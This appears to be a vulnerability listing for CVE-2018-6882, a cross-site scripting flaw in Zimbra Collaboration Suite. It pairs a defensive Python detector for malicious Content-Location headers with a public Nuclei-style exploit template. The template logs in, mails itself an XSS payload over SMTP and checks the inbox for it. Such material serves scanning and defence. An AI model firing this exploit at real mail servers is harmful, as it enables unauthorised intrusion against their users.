CVE-2018-6882: Zimbra Collaboration Suite - Cross-site Scripting

Date: 2025-08-01 | Affected software: Zimbra Collaboration Suite | PoC: public

Vulnerability description

Cross-site scripting (XSS) vulnerability in the ZmMailMsgView.getAttachmentLinkHtml function in Zimbra Collaboration Suite (ZCS) before 8.7 Patch 1 and 8.8.x before 8.8.7 might allow remote attackers to inject arbitrary web script or HTML via a Content-Location header in an email attachment.
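As an added example (not part of this page's template and not Zimbra's code), a defender-side check that parses a raw message, flags attachment parts whose Content-Location header carries attribute-breaking characters, and shows a hypothetical attribute-escaped link of the kind the attachment-link builder should emit; the sample message, the link format and the function names are constructed assumptions.

```python
import email
import html
import re
from email import policy

# Characters that never appear in a valid URI but would terminate an HTML
# attribute if the header value were interpolated into a link unescaped.
SUSPICIOUS = re.compile(r"""[<>"'\s]""")

def attachment_content_locations(raw_message: bytes):
    """Yield (filename, Content-Location) for every attachment part."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    for part in msg.walk():
        if part.is_multipart() or part.get_content_disposition() != "attachment":
            continue
        loc = part.get("Content-Location")
        if loc is not None:
            yield part.get_filename(), str(loc)

def is_suspicious_content_location(value: str) -> bool:
    return SUSPICIOUS.search(value) is not None

def flag_message(raw_message: bytes):
    """Return the attachments whose Content-Location looks like markup injection."""
    return [(name, loc) for name, loc in attachment_content_locations(raw_message)
            if is_suspicious_content_location(loc)]

def safe_attachment_link(filename: str, content_location: str) -> str:
    """Hypothetical hardened link builder (assumed format, not Zimbra's):
    attribute-escape the header value so it cannot close the href attribute."""
    return '<a href="{}">{}</a>'.format(html.escape(content_location, quote=True),
                                        html.escape(filename, quote=True))

# Constructed sample with the same structure as the PoC mail on this page.
SAMPLE = b"""From: sender@example.test
To: victim@example.test
Subject: Test Subject
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: text/plain; name="attachment.txt"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="attachment.txt"
Content-Location: http://foo.bar'></a><img src=a onerror=alert(document.domain)>

YXR0YWNobWVudAo=
--B1--
"""
```

Run `flag_message` over messages at the mail gateway or in a mailbox export to find attachments carrying this header pattern; `safe_attachment_link` illustrates the CWE-79 mitigation side.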

PoC code [public]

id: CVE-2018-6882

info:
  name: Zimbra Collaboration Suite - Cross-site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in the ZmMailMsgView.getAttachmentLinkHtml function in Zimbra Collaboration Suite (ZCS) before 8.7 Patch 1 and 8.8.x before 8.8.7 might allow remote attackers to inject arbitrary web script or HTML via a Content-Location header in an email attachment.
  reference:
    - https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-6882
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.8
    cve-id: CVE-2018-6882
    epss-score: 0.63278
    epss-percentile: 0.98304
    cwe-id: CWE-79
    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: zimbra
    product: collaboration_server
  tags: cve,cve2018,smtp,zimbra,collaboration-server,intrusive,xss,kev,vkev

flow: http(1) && tcp(1) && http(2) && http(3)

variables:
  mail: "{{mail}}"
  pass: "{{pass}}"
  user: "{{user}}"
  base: "{{interactsh-url}}"

http:
  - raw:
      - |
        GET /js/zimbraMail/share/model/ZmSettings.js HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        name: version
        regex:
          - 'CLIENT_VERSION",\s*\{[^}]*defaultValue:"(?:8\.7\.(?:0|5|11)|8\.8\.(?:0|6))(?:_GA_[0-9]+)?"'
        part: body

      - type: dsl
        name: zimbra-detect
        condition: and
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Zimbra Collaboration Suite")'

  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: ZM_TEST=true

        loginOp=login&username={{user}}&password={{pass}}&client=preferred

    redirects: true
    extractors:
      - type: regex
        name: csrf
        part: body
        regex:
          - 'window\.csrfToken\s*=\s*"([^"]+)"'
        internal: true
        group: 1

      - type: regex
        name: session
        part: body
        regex:
          - '"session":\s*\{"id":"([0-9]+)"'
        internal: true
        group: 1
    cookie-reuse: true

  - raw:
      - |
        POST /service/soap/SearchConvRequest HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/soap+xml; charset=UTF-8
        X-Zimbra-Csrf-Token: {{csrf}}

        {"Header":{"context":{"_jsns":"urn:zimbra","userAgent":{"name":"ZimbraWebClient - FF128 (Linux)","version":"8.7.11_GA_1854"},"session":{"_content":"{{session}}","id":{{session}}},"account":{"_content":"{{mail}}","by":"name"},"csrfToken":"{{csrf}}"}},"Body":{"SearchConvRequest":{"_jsns":"urn:zimbraMail","sortBy":"dateDesc","header":[{"n":"List-ID"},{"n":"X-Zimbra-DL"},{"n":"IN-REPLY-TO"}],"tz":{"id":"Asia/Kolkata"},"locale":{"_content":"en_US"},"offset":0,"limit":250,"query":"in:inbox","cid":"-257","fetch":"u!","html":1,"needExp":1,"max":250000,"recip":"2"}}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "onerror=alert(document.domain)")'
          - 'contains(content_type, "text/javascript")'
        condition: and

tcp:
  - host:
      - "{{Hostname}}"
    port: 25

    inputs:
      - read: 1024

      - data: "EHLO {{base}}\r\n"
        read: 1024

      - data: "MAIL FROM:<{{mail}}>\r\n"
        read: 1024

      - data: "RCPT TO:<{{mail}}>\r\n"
        read: 1024

      - data: "DATA\r\n"
        read: 1024

      - data: |
          From: {{mail}}
          To: {{mail}}
          Subject: Test Subject
          MIME-Version: 1.0
          Content-Type: multipart/mixed; boundary="BOUNDARY_12345"

          --BOUNDARY_12345
          Content-Type: text/plain; charset="utf-8"

          Check the attachment

          --BOUNDARY_12345
          Content-Type: text/plain; name="attachment.txt"
          Content-Transfer-Encoding: base64
          Content-Disposition: attachment; filename="attachment.txt"
          Content-Location: http://foo.bar'></a><img src=a onerror=alert(document.domain)>

          YXR0YWNobWVudAo=
          --BOUNDARY_12345--
          .
        read: 1024

      - data: "QUIT\r\n"
        read: 1024
# digest: 490a00463044022041805ab3c5c7902f3738646d8b2ea2c4254b1b8d1bd3fbcd8dd17db5be6d5f1d022068366ce011bde13a7378fd4bbda562c99f737f0846d6c7dcd490c23fe110f000:922c64590222798bb761d5b6d8e72950
